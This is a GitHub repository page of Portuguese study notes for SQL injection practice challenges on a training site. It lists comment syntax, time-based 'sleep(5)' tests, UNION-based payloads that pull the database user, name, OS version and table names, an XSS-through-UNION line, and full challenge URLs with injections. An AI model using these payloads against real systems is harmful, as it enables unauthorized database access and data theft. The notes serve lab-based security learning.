[go: nahoru, domu]

Skip to content

an4kein/leettime

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

22 Commits
 
 
 
 

Repository files navigation

leettime

DB : TABELA : COLUNA : LINHA

select COLUNA0,COLUNA1 from TABELA0

select * from notas where **IDaluno=1337 **

select * from notas where IDaluno='1337'

select * from notas where IDaluno="1337"

select * from notas where IDaluno=(1337)

select * from notas where IDaluno('1337')

select * from notas where IDaluno("1337")

?id=????

________________________________________                                                              
     TABELA0         |   TABELA2        |                                                             
_____________________|__________________|                                                             
COLUNA1  |   COLUNA2 | COLUNA1 | COLUNA2|
---------------------|------------------|
 LINHA1  |   LINHA1  | [...]   | [...]
 LINHA2  |   LINHA2  |
             LINHA3  |
COMENTARIOS: -- | # | ;%00 | `

SQLI: select * from username where id=1

SQLI: select nome from username where id=injection

id=1' and sleep(5)--+a   <<<<<< FACA ISSO SEMPRE


1- BALANCEIO | 2- INJECTION | 3-COMENTARIO

SQLI: select * from username where id=1

SQLI: select nome from username where id=injection

id=1' and sleep(5)--+a   <<<<<< FACA ISSO SEMPRE


1- BALANCEIO | 2- INJECTION | 3-COMENTARIO

---------------------------------------------

UNION IDENTIFIQUE,<<<<<<<<<<<<

id=1' order by 1 --+anakein

?id=64' union select 13,<h1>PWN</h1>,3--+anakein      <<< XSS

?id=null' union select 66,user(),66--+anakein

?id=null' union select 66,database(),66--+anakein

?id=null' union select 66,concat(@@version_compile_os,0x20,@@version_compile_machine),66--+anakein

?id=null' union select 66,concat(select table_name from information_schema.tables where database()),66

Basic Injection

Challenge 1 >> '

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=null' union select 66,(select table_name from information_schema.tables where table_schema=database() limit 2,1),66--+anakein

list_table1

Challenge 3 >> "

http://leettime.net/sqlninja.com/tasks/basic_ch3.php?id=1" and sleep(5)--+anakein

chall_3

Challenge 4 >> ')

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1') and sleep(5) --+anakein

chall_4

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published